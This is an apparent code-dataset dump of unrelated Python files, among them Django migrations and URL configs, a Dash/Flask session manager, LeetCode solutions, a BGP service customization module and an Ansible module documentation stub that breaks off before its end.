blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0eea1f221c0a6316a2eed2457dffd111f15c8a0b | 16e69196886254bc0fe9d8dc919ebcfa844f326a | /edc/core/bhp_content_type_map/migrations/0005_update_module_name.py | 67a886c53b822966a1fc216991741f16ccb05bd3 | [] | no_license | botswana-harvard/edc | b54edc305e7f4f6b193b4498c59080a902a6aeee | 4f75336ff572babd39d431185677a65bece9e524 | refs/heads/master | 2021-01-23T19:15:08.070350 | 2015-12-07T09:36:41 | 2015-12-07T09:36:41 | 35,820,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,009 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
# Note: Remember to use orm['appname.ModelName'] rather than "from appname.models..."
ContentTypeMap = orm['bhp_content_type_map.ContentTypeMap']
for obj in ContentTypeMap.objects.all():
obj.module_name = obj.model
obj.save()
print (obj.app_label, obj.module_name)
def backwards(self, orm):
"Write your backwards methods here."
pass
models = {
'bhp_content_type_map.contenttypemap': {
'Meta': {'ordering': "['name']", 'unique_together': "(['app_label', 'model'],)", 'object_name': 'ContentTypeMap'},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'hostname_created': ('django.db.models.fields.CharField', [], {'default': "'mac.local'", 'max_length': '50', 'db_index': 'True', 'blank': 'True'}),
'hostname_modified': ('django.db.models.fields.CharField', [], {'default': "'mac.local'", 'max_length': '50', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'module_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'user_created': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'db_index': 'True'}),
'user_modified': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'db_index': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['bhp_content_type_map']
symmetrical = True
| [
"[email protected]"
] | |
d7bdeb211ad293ec25a6cd5c0651169bf707cf41 | efb01c5a5f00e918780009d8e870c080ece8cdc5 | /tcapy/vis/sessionmanager.py | 2aaa853615f7ca3d9776036187eb762a0a27eca4 | [
"Apache-2.0"
] | permissive | PontusHultkrantz/tcapy | 0525af2b260377a3a5479112a5a8991efc581e7d | 3699c70031c95943f70a732849a1a6dac26760e9 | refs/heads/master | 2022-10-05T15:00:41.192500 | 2020-06-05T18:25:44 | 2020-06-05T18:25:44 | 269,728,925 | 0 | 0 | Apache-2.0 | 2020-06-05T18:00:02 | 2020-06-05T18:00:01 | null | UTF-8 | Python | false | false | 12,191 | py | from __future__ import print_function
__author__ = 'saeedamen' # Saeed Amen / [email protected]
#
# Copyright 2018 Cuemacro Ltd. - http//www.cuemacro.com / @cuemacro
#
# See the License for the specific language governing permissions and limitations under the License.
#
import uuid
from flask import session
from dash.dependencies import Output, Input, State
from tcapy.conf.constants import Constants
from tcapy.util.utilfunc import UtilFunc
constants = Constants()
class CallbackManager(object):
"""This class creates the appropriate Input and Output objects to wrap around dash components. It abstracts away
some of the complexity of dash, by allowing the user simplify to specify the string of the dash component.
It will then work out the dash type from the component name. Users need to be careful to name the dash components
with the correct names. For examples, all plots, must have 'plot' within their name.
"""
def input_callback(self, page, input):
"""Create input callbacks for Dash components, which can be used to trigger callbacks. We can have multiple
input callbacks for methods.
Parameters
----------
page : str
Name of the page (eg. 'detailed')
input : str (list)
Dash components where we wish to add dash based input callbacks
Returns
-------
dash.dependencies.Input (list)
"""
if not (isinstance(input, list)):
input = [input]
input_list = [Input(page + '-' + i.split(':')[0], self._find_type(i)) for i in input]
return input_list
def output_callback(self, page, output):
"""Create a output callback for a Dash component, which can be used to trigger callbacks. Note, that we can
only have a single output callback for each method.
Parameters
----------
page : str
Name of the page (eg. 'detailed')
output : str
Dash component where we wish to add dash based output callbacks
Returns
-------
dash.dependencies.Output (list)
"""
return Output(page + '-' + output.split(':')[0], self._find_type(output))
def state_callback(self, page, state):
"""Create state callbacks for Dash components, which can be used to trigger callbacks. We can have multiple
state callbacks for methods.
Parameters
----------
page : str
Name of the page (eg. 'detailed')
state : str (list)
Dash components where we wish to add dash based state callbacks
Returns
-------
dash.dependencies.State (list)
"""
if not (isinstance(state, list)):
state= [state]
state_list = [State(page + '-' + s.split(':')[0], self._find_type(s)) for s in state]
return state_list
def _find_type(self, tag):
"""Returns the dash type for a dash component.
Parameters
----------
tag : str
Tag for a Dash component
Returns
-------
str
"""
if ":" in tag:
return tag.split(":")[1]
# datepicker
if 'dtpicker' in tag:
return 'date'
# HTML links
if 'link' in tag:
return 'href'
# table like objects
if 'table' in tag:
if constants.gui_table_type == 'dash':
return 'data'
return 'children'
# labels
if 'status' in tag:
return 'children'
# plotly objects
if 'plot' in tag and 'val' not in tag:
return 'figure'
# drop down values
if 'val' in tag:
return 'value'
# HTML ordinary buttons
if 'button' in tag:
return 'n_clicks'
# HTML upload buttons
if 'upbutt' in tag:
return 'contents'
if 'uploadbox' in tag:
return 'contents'
import base64
import flask
class SessionManager(object):
"""Manages the caching of properties for a user's session. We use this extensively, to identify users and also to
store variables relating to users on the server side.
It is used for example, for keeping track of which lines have plotted, user's zoom actions, whether tcapy has already
plotted a particular dataset etc.
"""
def __init__(self):
self._util_func = UtilFunc()
# session ID management functions
def get_session_id(self):
"""Gets the current user's session ID and generates a unique one if necessary.
Returns
-------
str
"""
if 'id' not in session:
id = str(uuid.uuid4())
username = self.get_username()
if username is not None:
username = '_' + username
else:
username = ''
session['id'] = id + username
else:
id = session['id']
if not isinstance(id, str):
id = id.decode("utf-8")
return id
def get_username(self):
header = flask.request.headers.get('Authorization', None)
if not header:
return None
username_password = base64.b64decode(header.split('Basic ')[1])
username_password_utf8 = username_password.decode('utf-8')
username, password = username_password_utf8.split(':')
return username
def set_session_flag(self, tag, value=None):
"""Sets a value with a specific tag in the session dictionary, which is essentially unique for every user.
Parameters
----------
tag : str (dict)
The "hash key" for our variable
value : str
What to set the value in our hash table
Returns
-------
"""
if isinstance(tag, str):
tag = [tag]
if isinstance(tag, dict):
for t in tag:
self.set_session_flag(t, value=tag[t])
return
tag = self._util_func.flatten_list_of_lists(tag)
for t in tag:
session[t] = value
def get_session_flag(self, tag):
"""Gets the value of a tag in the user's session
Parameters
----------
tag : str
Tag to be fetched
Returns
-------
str
"""
if tag in session:
if isinstance(session[tag], bool):
return session[tag]
return str(session[tag])
return None
##### these methods are for keeping track of which lines, user zooms have been plotted for each chart in the user's
##### session object
def check_lines_plotted(self, lines_to_plot, tag):
"""Checks if the lines have been plotted for a particular user, by checking the plot's tag in their user session
Parameters
----------
lines_to_plot : str (list)
Lines to be plotted
tag : str
Tag of plotted lines
Returns
-------
bool
"""
if tag in session:
lines_plotted = session[tag]
if set(lines_to_plot) == set(lines_plotted):
return True
return False
def check_relayoutData_plotted(self, relayoutData, tag):
"""Checks if the relayout data (ie. related to user's clicks, such as when they zoom in) has already been plotted.
Parameters
----------
relayoutData : dict
tag : str
Tag referring to a particular plot
Returns
-------
"""
if tag in session:
# relayoutDataSet = None
# sessionTagSet = None
#
# if relayoutData is not None:
# relayoutDataSet = set(relayoutData)
#
# if session[tag] is not None:
# sessionTagSet = set(session[tag])
# if relayoutData is None:
# return False
if relayoutData == session[tag]:
return True
return False
def set_lines_plotted(self, lines_to_plot, tag):
"""Sets the lines plotted for a particular chart tag in the user's session
Parameters
----------
lines_to_plot : str (list)
Lines plotted
tag : str
Tag of the plot
Returns
-------
"""
session[tag] = lines_to_plot
def set_relayoutData_plotted(self, relayoutData, tag):
"""Sets the user's clicks (typically for zooming into charts) for a particular chart
Parameters
----------
relayoutData : dict
Details a user's click on the chart
tag : str
Tag referring to the plot
Returns
-------
"""
session[tag] = relayoutData
def set_username(self, username):
session['username'] = username
##### We identify when a user has "clicked" a button by change in the number of clicks (Dash documentation recommends
##### this to handle user clicks)
def get_session_clicks(self, tag):
"""Gets the number of clicks for the tag. If doesn't exist, we automatically set the tag as 0.
Parameters
----------
tag : str
The tag for which we want to return the number of clicks
Returns
-------
Number of clicks by current user
"""
if tag not in session:
return 0
return session[tag]
def set_session_clicks(self, tag, n_clicks, old_clicks=None):
"""Sets the number of clicks in the current user's session
Parameters
----------
tag : str
Tag to store the user's clicks under
n_clicks : int
Number of clicks to set
Returns
-------
"""
if old_clicks is None:
session[tag] = n_clicks
elif old_clicks > n_clicks:
session[tag] = n_clicks
def check_session_tag(self, tag):
"""Checks if a tag exists in the user's session, and if so returns the value of that tag in the user's session
Parameters
----------
tag : str
Tag to check
Returns
-------
str or bool
"""
if tag in session:
return session[tag]
return False
def exists_session_tag(self, tag):
"""Does a tag exist in the current user session?
Parameters
----------
tag : str
Returns
-------
bool
"""
return tag in session
def check_session_reset_tag(self, tag):
"""Checks if a tag is in session (if that tag exists already and is "True", then we reset it to "False"), otherwise
return "False"
Parameters
----------
tag : str
Tags to check
Returns
-------
bool
"""
if tag in session:
old_tag = session[tag]
if old_tag:
session[tag] = False
return True
return False
return False
def create_calculated_flags(self, prefix, lst=None, lst2=None):
"""Creates a list for a combination of prefix and list elements.
Parameters
----------
prefix : str
Prefix (typically a page name like 'detailed')
lst : str (list)
Tags will contain these
lst2 : str (list)
Tags will contain these
Returns
-------
str (list)
"""
if isinstance(prefix, list):
prefix = self._util_func.flatten_list_of_lists(prefix)
lst = [x + '-' + lst for x in prefix]
elif isinstance(lst, list):
lst = self._util_func.flatten_list_of_lists(lst)
lst = [prefix + '-' + x for x in lst]
if lst2 is None:
return lst
lst3 = []
for i in lst2:
for j in lst:
lst3.append(j + '-' + i)
return lst3 | [
"[email protected]"
] | |
4404bba47db646d9416036a3aa8e535334e7902f | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4060/codes/1684_1100.py | 47661cdbda903bedb36e8d7ab2f89e70b5985e55 | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | # Teste seu código aos poucos.
# Não teste tudo no final, pois fica mais difícil de identificar erros.
# Ao testar sua solução, não se limite ao caso de exemplo.
a=int(input("Entrada: "))
print("Entrada:",a)
if((a!=2)and(a!=5)and(a!=10)and(a!=20)and(a!=50)and(a!=100)):
print("Animal: Invalido")
elif(a==2):
print("Animal: Tartarura")
elif(a==5):
print("Animal: Garca")
elif(a==10):
print("Animal: Arara")
elif(a==20):
print("Animal: Mico-leao-dourado")
elif(a==50):
print("Animal: Onca-pintada")
else:
print("Animal: Garoupa") | [
"[email protected]"
] | |
fc1fa4990f3eb7c426991f2e920afe5ac67e8b2a | 150d9e4cee92be00251625b7f9ff231cc8306e9f | /ReverseWordsIII.py | 35bceae2ed4be0c631984cf4c703decb182946b7 | [] | no_license | JerinPaulS/Python-Programs | 0d3724ce277794be597104d9e8f8becb67282cb0 | d0778178d89d39a93ddb9b95ca18706554eb7655 | refs/heads/master | 2022-05-12T02:18:12.599648 | 2022-04-20T18:02:15 | 2022-04-20T18:02:15 | 216,547,245 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,277 | py | '''
557. Reverse Words in a String III
Given a string s, reverse the order of characters in each word within a sentence while still preserving whitespace and initial word order.
Example 1:
Input: s = "Let's take LeetCode contest"
Output: "s'teL ekat edoCteeL tsetnoc"
Example 2:
Input: s = "God Ding"
Output: "doG gniD"
Constraints:
1 <= s.length <= 5 * 104
s contains printable ASCII characters.
s does not contain any leading or trailing spaces.
There is at least one word in s.
All the words in s are separated by a single space.
'''
class Solution(object):
def reverseWords(self, s):
"""
:type s: str
:rtype: str
"""
word_list = s.split()
word_list_list = []
result = ""
for word in word_list:
temp = list(word)
word_list_list.append(temp)
for word in word_list_list:
start = 0
end = len(word) - 1
while start <= end:
temp = word[start]
word[start] = word[end]
word[end] = temp
start = start + 1
end = end - 1
for word in word_list_list:
result = result + ''.join(word) + " "
return result[:-1]
obj = Solution()
print(obj.reverseWords("Let's take LeetCode contest")) | [
"[email protected]"
] | |
87dc46c97d4047d73908836fa9cea55aafcbdcd3 | 24fac945c7825c502f9fb2e6df06db26b80b5676 | /blogdjangogirls/urls.py | 230fe7f82e3aea6d486403578d1fc5bd5bdbd700 | [] | no_license | mario220696/my-first-blog | 8f0a9883c4ecde58a8c3483e5ad0823b81a4db7c | 72ec03a579965c984a770f0c4cca0a3eca28aa46 | refs/heads/master | 2020-03-17T11:48:03.954834 | 2018-05-15T19:28:36 | 2018-05-15T19:28:36 | 133,564,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 757 | py | """blogdjangogirls URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
5972e9b3b763273f9a652d66f3d080b66c693961 | 6dedbcff0af848aa979574426ad9fa3936be5c4a | /cengal/parallel_execution/coroutines/coro_standard_services/remote_nodes/versions/v_0/request_class_info.py | fb2ff414d2289c06f43f46ac97d35a61e59d0cfe | [
"Apache-2.0"
] | permissive | FI-Mihej/Cengal | 558d13541865e22006431bd1a1410ad57261484a | d36c05f4c90dfdac7296e87cf682df2f4d367e4b | refs/heads/master | 2023-06-08T00:39:39.414352 | 2023-06-05T21:35:50 | 2023-06-05T21:35:50 | 68,829,562 | 10 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,043 | py | #!/usr/bin/env python
# coding=utf-8
# Copyright © 2012-2023 ButenkoMS. All rights reserved. Contacts: <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module Docstring
Docstrings: http://www.python.org/dev/peps/pep-0257/
"""
__author__ = "ButenkoMS <[email protected]>"
__copyright__ = "Copyright © 2012-2023 ButenkoMS. All rights reserved. Contacts: <[email protected]>"
__credits__ = ["ButenkoMS <[email protected]>", ]
__license__ = "Apache License, Version 2.0"
__version__ = "3.2.6"
__maintainer__ = "ButenkoMS <[email protected]>"
__email__ = "[email protected]"
# __status__ = "Prototype"
__status__ = "Development"
# __status__ = "Production"
from enum import Enum
from cengal.parallel_execution.coroutines.coro_scheduler import *
from cengal.parallel_execution.coroutines.coro_tools.await_coro import *
from cengal.parallel_execution.coroutines.coro_standard_services.asyncio_loop import *
from cengal.parallel_execution.coroutines.coro_standard_services.loop_yield import CoroPriority
from cengal.parallel_execution.coroutines.coro_standard_services.put_coro import *
from cengal.parallel_execution.coroutines.coro_standard_services.timer_func_runner import *
from cengal.file_system.file_manager import path_relative_to_current_dir
from cengal.time_management.load_best_timer import perf_counter
from cengal.data_manipulation.serialization import *
from typing import Hashable, Tuple, List, Any, Dict, Callable, Type
from cengal.introspection.inspect import get_exception, entity_owning_module_importable_str, entity_owning_module_info_and_owning_path, entity_properties
from cengal.io.core.memory_management import IOCoreMemoryManagement
from cengal.parallel_execution.asyncio.efficient_streams import StreamManagerIOCoreMemoryManagement, TcpStreamManager, UdpStreamManager, StreamManagerAbstract
from cengal.code_flow_control.smart_values import ValueExistence
from cengal.io.named_connections.named_connections_manager import NamedConnectionsManager
from cengal.code_flow_control.args_manager import number_of_provided_args
from cengal.data_manipulation.serialization import Serializer, Serializers, best_serializer
from cengal.code_flow_control.args_manager import find_arg_position_and_value, UnknownArgumentError
from cengal.data_generation.id_generator import IDGenerator, GeneratorType
from cengal.system import PLATFORM_NAME, PYTHON_VERSION
from importlib import import_module
import sys
import os
import asyncio
import lmdb
from .exceptions import *
from .commands import *
from .class_info import *
class LocalRequestClassInfo(LocalClassInfo):
def __init__(self, local_id: Hashable, request: Request) -> None:
super().__init__(local_id, type(request))
self._properties: Dict[str, Hashable] = {property_name: index for index, property_name in enumerate(entity_properties(request))} # key: property name; value: property id
self._properties_tuple: Tuple[Tuple[str, Hashable]] = tuple(self._properties.items())
def __call__(self) -> Type:
return {
CommandDataFieldsDeclareServiceRequestClass.local_id.value: self._local_id,
CommandDataFieldsDeclareServiceRequestClass.class_name.value: self._class_name,
CommandDataFieldsDeclareServiceRequestClass.module_importable_str.value: self._module_importable_str,
CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value: self._properties_tuple,
}
@property
def properties(self):
return self._properties
@property
def properties_tuple(self):
return self._properties_tuple
def request_to_data(self, request: Request) -> Dict:
return {
CommandDataFieldsServiceRequestWithRequestClass.request_class_id.value: self._local_id,
CommandDataFieldsServiceRequestWithRequestClass.properties_tuple.value: tuple(((property_id, getattr(request, property_name)) for property_name, property_id in self._properties_tuple)),
}
class RemoteRequestClassInfo(RemoteClassInfo):
def __init__(self, local_id: Hashable, class_name: str, module_importable_str: str, properties_tuple: Tuple[Tuple[str, Hashable]]) -> None:
super().__init__(local_id, class_name, module_importable_str)
self._properties_tuple: Tuple[Tuple[str, Hashable]] = properties_tuple
self._properties: Dict[Hashable, str] = {index: property_name for property_name, index in properties_tuple} # key: property id; value: property name
@classmethod
def from_data(cls, data: Dict[Hashable, Any]) -> 'RemoteRequestClassInfo':
local_id: Hashable = data[CommandDataFieldsDeclareServiceRequestClass.local_id.value]
class_name: str = data[CommandDataFieldsDeclareServiceRequestClass.class_name.value]
module_importable_str: str = data[CommandDataFieldsDeclareServiceRequestClass.module_importable_str.value]
properties_tuple: Tuple[Tuple[str, Hashable]] = data[CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value]
return cls(local_id, class_name, module_importable_str, properties_tuple)
def __call__(self, data: Dict) -> Request:
request: Request = self.class_type()
properties_tuple: Tuple[Tuple[Hashable, Any]] = data[CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value]
for index, value in properties_tuple:
name: str = self._properties[index]
setattr(request, name, value)
return request
| [
"[email protected]"
] | |
c7be3da8472cb8def0f76e0cac71b79a7063ba14 | c829275111b9025dcccc9ac1b92d8dc51adbb71d | /photo/urls.py | 4fec7ab88e9eb5f629a088b997138a2b641ed5cb | [
"MIT"
] | permissive | Ken-mbira/PHOTO_BOOK | f1bd1bd65af228b0600bf69da12840897eb109ad | d47cd8dabd4b92e3befdafe2d99db266be31ffff | refs/heads/master | 2023-08-19T06:55:07.309342 | 2021-10-12T11:05:00 | 2021-10-12T11:05:00 | 414,297,623 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 521 | py | from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from . import views
urlpatterns = [
path('',views.index,name = 'home'),
path('images/',views.images,name = 'images'),
path('images/<int:pk>',views.image_spec,name = 'image'),
path('category/<int:pk>',views.image_category,name = 'category'),
path('search',views.search_images, name="search")
]
if settings.DEBUG:
urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT) | [
"[email protected]"
] | |
20cf30291dd3e1ce42e9eac92e98cb83666fbc14 | 303bac96502e5b1666c05afd6c2e85cf33f19d8c | /solutions/python3/946.py | 08e5a7f4e305aa8dfddd5a773566d9bdd70744e5 | [
"MIT"
] | permissive | jxhangithub/leetcode | 5e82f4aeee1bf201e93e889e5c4ded2fcda90437 | 0de1af607557d95856f0e4c2a12a56c8c57d731d | refs/heads/master | 2022-05-22T12:57:54.251281 | 2022-03-09T22:36:20 | 2022-03-09T22:36:20 | 370,508,127 | 1 | 0 | MIT | 2022-03-09T22:36:20 | 2021-05-24T23:16:10 | null | UTF-8 | Python | false | false | 392 | py | class Solution:
def validateStackSequences(self, pushed, popped):
"""
:type pushed: List[int]
:type popped: List[int]
:rtype: bool
"""
arr, i = [], 0
for num in pushed:
arr.append(num)
while arr and arr[-1] == popped[i]:
i += 1
arr.pop()
return arr == popped[i:][::-1] | [
"[email protected]"
] | |
f2a2c09d102ebb4c12b5678990d4b07e6fa71280 | 16eaa90eec58137c7cf0e429e574499d00ee21f2 | /apps/manga/models/manga.py | 325ffa9c350f2a247de6aad14b844a1d38c33887 | [
"MIT"
] | permissive | eliezer-borde-globant/lemanga | 53c48f91f5df4671c1653ab927acab3c95097468 | 57c799804754f6a91fd214faac84d9cd017fc0c4 | refs/heads/master | 2023-02-16T23:25:49.889702 | 2020-12-28T17:27:49 | 2020-12-28T17:27:49 | 322,420,102 | 0 | 0 | MIT | 2020-12-17T23:10:32 | 2020-12-17T21:43:56 | null | UTF-8 | Python | false | false | 748 | py | from __future__ import unicode_literals
import uuid
from django.core.urlresolvers import reverse_lazy
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from autoslug import AutoSlugField
@python_2_unicode_compatible
class Manga(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(max_length=200, unique=True)
slug = AutoSlugField(populate_from='name', unique=True, always_update=True)
class Meta:
verbose_name = "Manga"
verbose_name_plural = "Mangas"
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse_lazy('detail-manga', kwargs={"name": self.slug})
| [
"[email protected]"
] | |
528f4f027317f1d22c63b7a145d3182c87daa77f | 86fc644c327a8d6ea66fd045d94c7733c22df48c | /scripts/managed_cpe_services/customer/single_cpe_dual_wan_site/single_cpe_dual_wan_site_services/cpe_primary_wan/end_points/bgp_peers/service_customization.py | 7e389e7294aa0bde9644faa5fec5bf5a73b91948 | [] | no_license | lucabrasi83/anutacpedeployment | bfe703657fbcf0375c92bcbe7560051817f1a526 | 96de3a4fd4adbbc0d443620f0c53f397823a1cad | refs/heads/master | 2021-09-24T16:44:05.305313 | 2018-10-12T02:41:18 | 2018-10-12T02:41:18 | 95,190,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,162 | py | #
# This computer program is the confidential information and proprietary trade
# secret of Anuta Networks, Inc. Possessions and use of this program must
# conform strictly to the license agreement between the user and
# Anuta Networks, Inc., and receipt or possession does not convey any rights
# to divulge, reproduce, or allow others to use this program without specific
# written authorization of Anuta Networks, Inc.
#
# Copyright (c) 2015-2016 Anuta Networks, Inc. All Rights Reserved.
#
#
#ALL THE CUSTOMIZATIONS REGARDING DATAPROCESSING SHOULD BE WRITTEN INTO THIS FILE
#
"""
Tree Structure of Handled XPATH:
services
|
managed-cpe-services
|
customer
|
single-cpe-dual-wan-site
|
single-cpe-dual-wan-site-services
|
cpe-primary-wan
|
end-points
|
bgp-peers
Schema Representation:
/services/managed-cpe-services/customer/single-cpe-dual-wan-site/single-cpe-dual-wan-site-services/cpe-primary-wan/end-points/bgp-peers
"""
"""
Names of Leafs for this Yang Entity
BGP-peer-name
peer-ip
peer-description
remote-as
password
import-route-map
export-route-map
next-hop-self
soft-reconfiguration
default-originate
default-originate-route-map
send-community
encrypted-password
advertisement-interval
time-in-sec
timers
keepalive-interval
holdtime
"""
from servicemodel import util
from servicemodel import yang
from servicemodel import devicemgr
from cpedeployment.cpedeployment_lib import getLocalObject
from cpedeployment.cpedeployment_lib import getDeviceObject
from cpedeployment.cpedeployment_lib import getCurrentObjectConfig
from cpedeployment.cpedeployment_lib import ServiceModelContext
from cpedeployment.cpedeployment_lib import getParentObject
from cpedeployment.cpedeployment_lib import log
from cpedeployment.bgppeer_lib import bgp_peer
from cpedeployment.bgppeer_lib import update_bgp_peer
class ServiceDataCustomization:
@staticmethod
def process_service_create_data(smodelctx, sdata, dev, **kwargs):
""" Custom API to modify the inputs"""
modify = True
if modify and kwargs is not None:
for key, value in kwargs.iteritems():
log("%s == %s" %(key,value))
if modify:
config = kwargs['config']
inputdict = kwargs['inputdict']
@staticmethod
def process_service_device_bindings(smodelctx, sdata, dev, **kwargs):
""" Custom API to modify the device bindings or Call the Business Login Handlers"""
modify = True
if modify and kwargs is not None:
for key, value in kwargs.iteritems():
log("%s == %s" %(key,value))
if modify:
config = kwargs['config']
inputdict = kwargs['inputdict']
devbindobjs = kwargs['devbindobjs']
for device in util.convert_to_list(dev):
bgp_peer('cpe_dual', 'cpe_primary_dual', smodelctx, sdata, device, **kwargs)
@staticmethod
def process_service_update_data(smodelctx, sdata, **kwargs):
"""callback called for update operation"""
modify = True
if modify and kwargs is not None:
for key, value in kwargs.iteritems():
log("%s == %s" %(key,value))
dev = kwargs['dev']
for device in util.convert_to_list(dev):
update_bgp_peer('cpe_dual', 'cpe_primary_dual', smodelctx, sdata, device, **kwargs)
@staticmethod
def process_service_delete_data(smodelctx, sdata, **kwargs):
"""callback called for delete operation"""
modify = False
if modify and kwargs is not None:
for key, value in kwargs.iteritems():
log("%s == %s" %(key,value))
class DeletePreProcessor(yang.SessionPreProcessor):
def processBeforeReserve(self, session):
operations = session.getOperations()
"""Add any move operations for Deletion"""
log('operations: %s' % (operations))
class CreatePreProcessor(yang.SessionPreProcessor):
def processBeforeReserve(self, session):
operations = session.getOperations()
"""Add any move operations for creation"""
log('operations: %s' % (operations))
| [
"[email protected]"
] | |
33342edc351835d96fc30b2229c64f36d1195aa5 | 0e25538b2f24f1bc002b19a61391017c17667d3d | /storefront/win_sfstore.py | 182c135f774ac6bf02adb5b401eac608aa296006 | [] | no_license | trondhindenes/Ansible-Auto-Generated-Modules | 725fae6ba9b0eef00c9fdc21179e2500dfd6725f | efa6ac8cd2b545116f24c1929936eb8cc5c8d337 | refs/heads/master | 2020-04-06T09:21:00.756651 | 2016-10-07T07:08:29 | 2016-10-07T07:08:29 | 36,883,816 | 12 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,533 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# <COPYRIGHT>
# <CODEGENMETA>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
DOCUMENTATION = '''
---
module: win_sfstore
version_added:
short_description: Generated from DSC module storefront version 0.9.4 at 07.10.2016 01.23.53
description:
- The Storefront DSC resources can automate the deployment and configuration of Citrix Storefront 3.5. These DSC resources are provided AS IS, and are not supported through any means.
options:
AuthenticationServiceVirtualPath:
description:
-
required: True
default:
aliases: []
VirtualPath:
description:
-
required: True
default:
aliases: []
Ensure:
description:
-
required: False
default:
aliases: []
choices:
- Absent
- Present
FriendlyName:
description:
-
required: False
default:
aliases: []
PsDscRunAsCredential_username:
description:
-
required: False
default:
aliases: []
PsDscRunAsCredential_password:
description:
-
required: False
default:
aliases: []
SiteId:
description:
-
required: False
default:
aliases: []
